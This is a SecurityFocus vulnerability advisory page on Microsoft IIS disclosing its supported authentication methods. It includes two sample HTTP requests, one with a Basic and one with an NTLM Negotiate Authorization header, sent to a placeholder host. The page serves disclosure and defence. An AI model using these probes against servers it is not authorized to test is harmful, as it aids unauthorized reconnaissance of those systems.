Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft IIS Authentication Method Disclosure Vulnerability

No exploit is required. The following HTTP requests have been provided as examples by David Litchfield (david@nextgenss.com):

GET / HTTP/1.1
Host: iis-server
Authorization: Basic cTFraTk6ZDA5a2xt

GET / HTTP/1.1
Host: iis-server
Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA=







 

Privacy Statement
Copyright 2008, SecurityFocus